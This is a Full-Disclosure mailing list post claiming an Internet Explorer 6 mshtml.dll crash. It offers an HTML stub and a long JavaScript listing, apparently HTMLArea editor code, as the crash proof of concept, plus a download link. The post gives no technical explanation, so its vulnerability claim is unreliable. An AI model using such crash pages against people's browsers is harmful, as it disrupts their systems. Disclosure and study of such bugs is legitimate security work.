[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Microsoft Internet Explorer Multiple Vulnerabilities(mshtml.dll)



Microsoft Internet Explorer Multiple Vulnerabilities(mshtml.dll)
Discovered by:SaiedHacker
Company of Program:Microsoft
  Tested On:Internet explorer 6.0.2900.2180
member of group:Siahacking,ArshamHacker,RHDS
  
to find how IE crached you shoud type this code into a HTML file and save that
   
            <!-----------------------------------H@ckeranShiraz Security 
Team-----------------------!>
               <!-- saved from 
url=(007)http://www.SaiedHackerPro.PersianBlog.com -->
                    <SCRIPT src="SaiedHacker.js" type=text/javascript></SCRIPT>
  
after typing these codes into a JS file:
   
  _editor_url = "editor/";
  if (typeof _editor_url == "string") {
              _editor_url = _editor_url.replace(/\x2f*$/, '/');
  } else {
              alert("WARNING: _editor_url is not set!  You should set this 
variable to the editor files path; it should preferably be an absolute path, 
like in '/Saiedhacker', but it can be relative if you prefer.  Further we will 
try to load the editor files correctly but we'll probably fail.");
  }
  if (typeof _editor_lang == "string") {
              _editor_lang = _editor_lang.toLowerCase();
  } else {
              _editor_lang = "en";
  }
   
  function HTMLArea(textarea, config) {
              if (HTMLArea.checkSupportedBrowser()) {
                          if (typeof config == "undefined") {
                                      this.config = new HTMLArea.Config();
                          } else {
                                      this.config = config;
                          }
                          this._htmlArea = null;
                          this._textArea = textarea;
                          this._editMode = "wysiwyg";
                          this.plugins = {};
                          this._timerToolbar = null;
                          this._timerUndo = setInterval(function() { 
if(config._doc) config._undoTakeSnapshot(); }, this.config.undoTimeout);
                          this._undoQueue = new Array();
                          this._undoPos = -1;
                          this._customUndo = true;
                          this._mdoc = document;
                          this.doctype = '';
              }
  };
  (
   
  function() {
              var scripts = HTMLArea._scripts = [ _editor_url + "htmlarea.js",
                                                                  _editor_url + 
"dialog.js",
                                                                  _editor_url + 
"popupwin.js",
                                                                  _editor_url + 
"lang/" + _editor_lang + ".js" ];
              var head = document.getElementsByTagName("head")[0];
              for (var i = 1; i < scripts.length; ++i) {
                          var script = document.createElement("script");
                          script.src = scripts[i];
                          head.appendChild(script);
              }
  }
   
   
   
  )();
  HTMLArea.RE_tagName = /(<\/|<)\s*([^ \t\n>]+)/ig;
  HTMLArea.RE_doctype = /(<!doctype((.|\n)*?)>)\n?/i;
  HTMLArea.RE_head    = /<head>((.|\n)*?)<\/head>/i;
  HTMLArea.RE_body    = /<body>((.|\n)*?)<\/body>/i;
   
  HTMLArea.Config = function () {
              this.version = "3.0";
   
              this.width = "auto";
              this.height = "auto";
              this.statusBar = false;
              this.undoSteps = 20;
              this.undoTimeout = 500;
              this.sizeIncludesToolbar = true;
              this.fullPage = false;
              this.pageStyle = "";
              this.killWordOnPaste = false;
              this.baseURL = document.baseURI || document.URL;
              if (this.baseURL && this.baseURL.match(/(.*)\/([^\/]+)/))
                          this.baseURL = RegExp.$1 + "/";
              this.imgURL = "images/";
              this.popupURL = "popups/";
              this.toolbar = [
                          [ "fontname", "space",
                            "fontsize", "space",
                            "formatblock", "space",
                            "bold", "italic", "underline", "strikethrough", 
"separator",
                            "subscript", "superscript", "separator",
                            "copy", "cut", "paste", "space", "undo", "redo" ],
   
                          [ "justifyleft", "justifycenter", "justifyright", 
"justifyfull", "separator",
                            "lefttoright", "righttoleft", "separator",
                            "insertorderedlist", "insertunorderedlist", 
"outdent", "indent", "separator",
                            "forecolor", "hilitecolor", "separator",
                            "inserthorizontalrule", "createlink", 
"insertimage", "inserttable", "htmlmode", "separator",
                            "popupeditor", "separator", "showhelp", "about" ]
              ];
   
              this.fontname = {
                          "Arial":     'arial,helvetica,sans-serif',
                          "Courier New":    'courier new,courier,monospace',
                          "Georgia":            'georgia,times new 
roman,times,serif',
                          "Tahoma":            
'tahoma,arial,helvetica,sans-serif',
                          "Times New Roman": 'times new roman,times,serif',
                          "Verdana":           
'verdana,arial,helvetica,sans-serif',
                          "impact":              'impact',
                          "WingDings":       'wingdings'
              };
   
              this.fontsize = {
                          "1 (8 pt)":  "1",
                          "2 (10 pt)": "2",
                          "3 (12 pt)": "3",
                          "4 (14 pt)": "4",
                          "5 (18 pt)": "5",
                          "6 (24 pt)": "6",
                          "7 (36 pt)": "7"
              };
   
              this.formatblock = {
                          "Heading 1": "h1",
                          "Heading 2": "h2",
                          "Heading 3": "h3",
                          "Heading 4": "h4",
                          "Heading 5": "h5",
                          "Heading 6": "h6",
                          "Normal": "p",
                          "Address": "address",
                          "Formatted": "pre"
              };
   
              this.customSelects = {};
   
              function cut_copy_paste(e, cmd, obj) {
                          e.execCommand(cmd);
              };
              this.btnList = {
                          bold: [ "Bold", "ed_format_bold.gif", false, 
function(e) {e.execCommand("bold");} ],
                          italic: [ "Italic", "ed_format_italic.gif", false, 
function(e) {e.execCommand("italic");} ],
                          underline: [ "Underline", "ed_format_underline.gif", 
false, function(e) {e.execCommand("underline");} ],
                          strikethrough: [ "Strikethrough", 
"ed_format_strike.gif", false, function(e) {e.execCommand("strikethrough");} ],
                          justifyleft: [ "Justify Left", "ed_align_left.gif", 
false, function(e) {e.execCommand("justifyleft");} ],
                          justifycenter: [ "Justify Center", 
"ed_align_center.gif", false, function(e) {e.execCommand("justifycenter");} ],
                          justifyright: [ "Justify Right", 
"ed_align_right.gif", false, function(e) {e.execCommand("justifyright");} ],
                          justifyfull: [ "Justify Full", 
"ed_align_justify.gif", false, function(e) {e.execCommand("justifyfull");} ],
                          insertorderedlist: [ "Ordered List", 
"ed_list_num.gif", false, function(e) {e.execCommand("insertorderedlist");} ],
                          insertunorderedlist: [ "Bulleted List", 
"ed_list_bullet.gif", false, function(e) 
{e.execCommand("insertunorderedlist");} ],
                          outdent: [ "Decrease Indent", "ed_indent_more.gif", 
false, function(e) {e.execCommand("outdent");} ],
                          indent: [ "Increase Indent", "ed_indent_less.gif", 
false, function(e) {e.execCommand("indent");} ],
                          forecolor: [ "Font Color", "ed_color_fg.gif", false, 
function(e) {e.execCommand("forecolor");} ],
                          hilitecolor: [ "Background Color", "ed_color_bg.gif", 
false, function(e) {e.execCommand("hilitecolor");} ],
                          createlink: [ "Insert Web Link", "ed_link.gif", 
false, function(e) {e.execCommand("createlink", true);} ],
                          insertimage: [ "Insert/Modify Image", "ed_image.gif", 
false, function(e) {e.execCommand("insertimage");} ],
                          htmlmode: [ "Toggle HTML Source", "ed_html.gif", 
true, function(e) {e.execCommand("htmlmode");} ],
                          undo: [ "Undoes your last action", "ed_undo.gif", 
false, function(e) {e.execCommand("undo");} ],
                          redo: [ "Redoes your last action", "ed_redo.gif", 
false, function(e) {e.execCommand("redo");} ],
                          cut: [ "Cut selection", "ed_cut.gif", false, 
cut_copy_paste ],
                          copy: [ "Copy selection", "ed_copy.gif", false, 
cut_copy_paste ],
                          paste: [ "Paste from clipboard", "ed_paste.gif", 
false, cut_copy_paste ],
                          lefttoright: [ "Direction left to right", 
"ed_left_to_right.gif", false, function(e) {e.execCommand("lefttoright");} ],
                          smiley: [ "smiley", "ed_smiley.gif", false, 
function(e) {e.execCommand("smiley");} ],
                          save: [ "save", "ed_save.gif", false, function(e) 
{e.execCommand("save");} ],
                          lang: [ "language", "ed_en.gif", false, function(e) 
{e.execCommand("lang");} ],
                          righttoleft: [ "Direction right to left", 
"ed_right_to_left.gif", false, function(e) {e.execCommand("righttoleft");} ]
              };
              for (var i in this.btnList) {
                          var btn = this.btnList[i];
                          btn[1] = _editor_url + this.imgURL + btn[1];
                          if (typeof HTMLArea.I18N.tooltips[i] != "undefined") {
                                      btn[0] = HTMLArea.I18N.tooltips[i];
                          }
              }
  };
   
  finally when you run the html file you see that internet explorer cant run 
those codes and craches very fast. for downloading these codes you can go to 
http://www.freewebtown.com/saiedhacker/Hacking.zip
Have time of your life
   
   
   
   
   


HackeranShiraz Security Team
SaiedHackerIran@xxxxxxxxx
www.SaiedHackerPro.PersianBlog.Com
 
---------------------------------
 Get your own web address.
 Have a HUGE year through Yahoo! Small Business.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/